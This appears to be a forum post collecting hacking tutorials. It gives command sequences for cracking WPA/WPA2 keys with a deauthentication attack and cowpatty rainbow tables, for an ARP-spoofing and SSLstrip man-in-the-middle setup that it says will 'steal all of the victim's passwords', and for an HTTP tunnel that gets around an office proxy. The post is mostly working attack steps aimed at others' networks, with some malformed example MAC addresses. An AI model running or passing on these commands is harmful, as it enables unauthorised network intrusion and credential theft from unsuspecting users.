Tutorials :D

WPA/WPA2 PSK Cracking using Rainbowtables with Cowpatty



ifconfig wlan0 up

airmon-ng start wlan0

ifconfig -a

airodump-ng mon0

airodump-ng -c 11 –bssid 0C:3H:44:79:12 -w LINKSYS mon0

aireplay-ng -0 30 -a 0C:3H:44:79:12 -c 22:31:A7:9L:14 mon0

./cowpatty

cowpatty -r LINKSYS -01.cap -d /root/Desktop/LINKSYS.wpa -s LINKSYS

——————————————————————————————————————–



What do the switches in these commands really mean?



-c after airodump-ng command = The channel the AP is located on

–bssid = The Mac Address of the AP you are attacking

-0 = Specifies to aireplay-ng that it will be a Deauth Atatck, “thats a zero by the way”

-c after aireplay-ng command specifies the client connected to the AP which you are attacking

./cowpatty = starts running cowpatty within Backtrack

-r = specifies the capture file you will be cracking using Cowpatty

-d = The directory of your RainBow Table you will be using for the attack. basically the location on your hard disk.



—————————————————————————————————-



Connect to open Authentication Network using terminal



iwconfig wlan0 essid “LINKSYS”

“Note” This command needs to have the “Parenthesis” around the ESSID name to work

——————————————————————————————————————–

SSL Strip Tutorial



1. Setting up IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

3. Setting up port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

python sslstrip.py -w secret

Once this setup is up and running perfectly, all of our victim’s traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim’s passwords sent supposedly over “SSL”



——————————————————————————————————————

Setting up an HTTP Tunnel



On the home computer (server):

sshd (start the ssh server)

hts –forward-port localhost:22 80 (start the HTTP Tunnel server)



On the office computer (client):

htc –forward-port 900 –proxy HttpProxy:3128 HomeComputer:80 (start the HTTP Tunnel client)

ssh -L 800:pop3server:113 sshlogin@localhost -p 900 (start the ssh client)



Then read your email with your mail program at localhost:800

Notes on HTTP tunneling:

If your proxy requires authentication, add –proxy-authorization login:password to the htc command line.
sshlogin is your ssh login name on the ssh server on the Home computer.
You can set up as many additionnal tunnels as you want with:
ssh -L localport:destinationServer:destinationPort sshlogin@localhost -p 900
(localport is the local port you want to map to a destination server outside the firewall (destinationServer:destinationPort)).
Drawbacks of this solution:

it does not work for UDP-based protocols (NFS, chat…).
it does not work for programs which act as server (most games, chat, peer-to-peer…)
HTTP encapsulations and proxy delays can add some latency.
Good point of this solution:

Setting up the server is easy.
By using ports above 1024, setting up the client does not require administratror (root) privileges.
Multiple users can use the server to create multiple tunnels to any destination. Each user has its own private tunnels.
This tunnel can secure communications even if the proxy does not accept to proxy HTTPS.
This tunnel does not require the HTTP proxy to accept the CONNECT command.
This tunnel can work on proxies which are not capable of – or forbid – proxying of HTTPS (port 443).
With Linux Live CDs like Knoppix this can be a great solution for cybercafés: Live Linux CD ensures there is no lurking keylogger or troyan, and the tunnel ensures that the cybercafé owner, a troyaned computer or the government cannot sniff your passwords, spy on your data or censor websites. I especially think of China here.
Try this out it’s free as well [You must be registered and logged in to see this link.]

ausin mo kya ang tutorial XDD